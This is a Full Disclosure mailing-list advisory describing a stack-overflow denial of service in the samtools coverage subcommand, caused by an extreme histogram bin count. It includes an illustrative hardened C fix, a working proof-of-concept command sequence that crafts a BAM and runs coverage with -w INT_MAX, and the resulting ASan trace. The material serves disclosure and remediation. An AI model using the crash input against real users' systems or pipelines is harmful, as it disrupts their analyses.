Message-ID: <CAFmK-GzspEa37GPgUA51NZGoMpW+8TfKOVVgMKEfO2XGV4h+xw@mail.gmail.com>
Date: Sun, 28 Sep 2025 12:13:48 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
In the samtools coverage subcommand, the -w / --n-bins option lets the
user choose how many "bins" the coverage histogram should contain. The
code computes:

stats[tid].bin_width = (stats[tid].end - stats[tid].beg) / n_bins;

When the number of bins (n_bins) is large relative to the region length
(end - beg), this integer division yields zero, and later arithmetic that
divides by or scales with bin_width produces out-of-range values. In
print_hist(), the calculations involving current_bin, row_bin_size and the
loop bounds then overflow or take unintended branches, and the function
exhausts the stack. Note that the ASan trace below shows a single
print_hist() frame directly under main_coverage(), so the stack is used up
inside that one call rather than through recursion. In practice, supplying
a huge bin count (e.g. 2147483647, i.e. INT_MAX) triggers a stack overflow
in print_hist() and crashes the program.
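To make the arithmetic concrete, the following is an added example (not samtools' own coverage.c) that places the division quoted above beside a hardened planner. The type and function names (hist_plan, plan_hist, hist_bin_for) and the MAX_BINS cap are assumptions for illustration; the advisory does not show what limit, if any, samtools applies. The hardened version validates the region, clamps n_bins to the region length so bin_width is never zero, caps the number of bins so the per-bin array stays bounded, checks the allocation size for overflow, and keeps the array on the heap instead of the stack.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>

/* Hypothetical hard cap on histogram columns (an assumption of this
 * example; the real limit in samtools, if any, is not shown in the text). */
#define MAX_BINS 65536

typedef struct {
    int64_t beg, end;    /* half-open region [beg, end) in base coordinates */
    int     n_bins;      /* the requested -w / --n-bins value */
    int64_t bin_width;   /* bases covered by each bin */
    int     bins_used;   /* bins actually produced after clamping */
    double *counts;      /* heap-allocated per-bin accumulator */
} hist_plan;

/* Mirrors the division quoted in the advisory. With n_bins larger than the
 * region length the quotient is 0, so a later "offset / bin_width" divides
 * by zero and a "bins * bin_width" loop bound collapses to nothing. */
static int64_t bin_width_unchecked(int64_t beg, int64_t end, int n_bins)
{
    return (end - beg) / n_bins;
}

/* Hardened planner: validates inputs, clamps n_bins to both the region
 * length (so bin_width >= 1) and MAX_BINS (so the per-bin array stays
 * bounded), sizes the allocation with an overflow check and puts it on the
 * heap. Returns 0 on success, -1 on bad input or allocation failure. */
static int plan_hist(hist_plan *p, int64_t beg, int64_t end, int n_bins)
{
    if (!p || beg < 0 || end <= beg || n_bins <= 0)
        return -1;
    int64_t len = end - beg;
    int64_t nb  = n_bins;
    if (nb > len)      nb = len;
    if (nb > MAX_BINS) nb = MAX_BINS;

    /* Round up so the final bin covers the tail of the region. */
    int64_t width = (len + nb - 1) / nb;
    int64_t used  = (len + width - 1) / width;   /* <= nb by construction */

    if ((uint64_t)used > SIZE_MAX / sizeof(double))
        return -1;
    double *counts = calloc((size_t)used, sizeof *counts);
    if (!counts)
        return -1;

    p->beg = beg; p->end = end; p->n_bins = n_bins;
    p->bin_width = width; p->bins_used = (int)used; p->counts = counts;
    return 0;
}

/* Bin index for a position, or -1 when the position is outside the region. */
static int hist_bin_for(const hist_plan *p, int64_t pos)
{
    if (pos < p->beg || pos >= p->end)
        return -1;
    int64_t idx = (pos - p->beg) / p->bin_width;
    return idx < p->bins_used ? (int)idx : p->bins_used - 1;
}

static void free_hist(hist_plan *p)
{
    free(p->counts);
    p->counts = NULL;
}

int main(void)
{
    /* The advisory's parameters: a 500,000,000-base reference and -w INT_MAX. */
    printf("unchecked bin_width = %lld\n",
           (long long)bin_width_unchecked(0, 500000000, INT_MAX));
    hist_plan p;
    if (plan_hist(&p, 0, 500000000, INT_MAX) == 0) {
        printf("hardened: bins_used=%d bin_width=%lld\n",
               p.bins_used, (long long)p.bin_width);
        free_hist(&p);
    }
    return 0;
}
```

With the advisory's inputs the unchecked division returns 0, while the planner clamps the request to 65536 columns, yielding a bin width of 7630 bases and 65531 bins, a few hundred kilobytes on the heap rather than an unbounded stack footprint.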
*Impact:*
- Denial of Service (DoS): the process aborts on a crafted BAM plus a large -w value.
- The ASan report is a stack-overflow (stack exhaustion hitting the guard region), not an out-of-bounds write; the output shown does not demonstrate controllable memory corruption.
*PoC (Proof of Concept)*
Create a minimal BAM with a large declared reference size and one read
(the SAM header records and the read are separated by newlines):
printf '@HD\tVN:1.6\n@SQ\tSN:chrX\tLN:500000000\nr1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII\n' \
  | ./samtools view -b -o huge.bam -
./samtools index huge.bam
Run coverage with a massive bin count:
./samtools coverage -w 2147483647 huge.bam
*Expected crash:*
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1070796==ERROR: AddressSanitizer: stack-overflow on address 0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0)
#0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22
#1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13
#2 0xab400a286044 in main /root/samtools/bamtk.c:271:55
#3 0xff6004352290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3
#5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)
SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22
in print_hist
==1070796==ABORTING
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/